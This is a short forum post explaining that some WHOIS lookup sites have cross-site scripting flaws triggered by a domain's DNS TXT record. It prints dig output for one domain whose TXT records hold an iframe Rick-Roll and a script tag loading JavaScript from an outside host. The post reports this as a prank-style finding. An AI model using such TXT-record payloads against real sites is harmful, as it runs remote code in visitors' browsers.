Black Raven Dragoons

[Zancarius]

That's right, XSS vulnerabilities are present in some WHOIS providers. All you have to do is put something in the TXT record of a domain you control, and anyone who visits the appropriately affected site gets Rick-Rolled.

(XSS = Cross-site Scripting vulnerability.)

Here's what the onerous TXT record appears to be as of this writing:

Code: Select all

[gridlock:~]$ dig txt jamiehankins.co.uk

; <<>> DiG 9.9.2-P2 <<>> txt jamiehankins.co.uk
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 22275
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 2, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;jamiehankins.co.uk.            IN      TXT

;; ANSWER SECTION:
jamiehankins.co.uk.     300     IN      TXT     "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0' allowfullscreen></iframe>"
jamiehankins.co.uk.     300     IN      TXT     "v=spf1 include:spf.mandrillapp.com ?all"
jamiehankins.co.uk.     300     IN      TXT     "google-site-verification=nZUP4BagJAjQZO6AImXyzJZBXBf9s1FbDZr8pzNLTCI"
jamiehankins.co.uk.     300     IN      TXT     "<script src='//peniscorp.com/topkek.js'></script>"

;; AUTHORITY SECTION:
jamiehankins.co.uk.     172800  IN      NS      hank.ns.cloudflare.com.
jamiehankins.co.uk.     172800  IN      NS      lucy.ns.cloudflare.com.

;; ADDITIONAL SECTION:
hank.ns.cloudflare.com. 12161   IN      A       173.245.59.116
hank.ns.cloudflare.com. 12161   IN      AAAA    2400:cb00:2049:1::adf5:3b74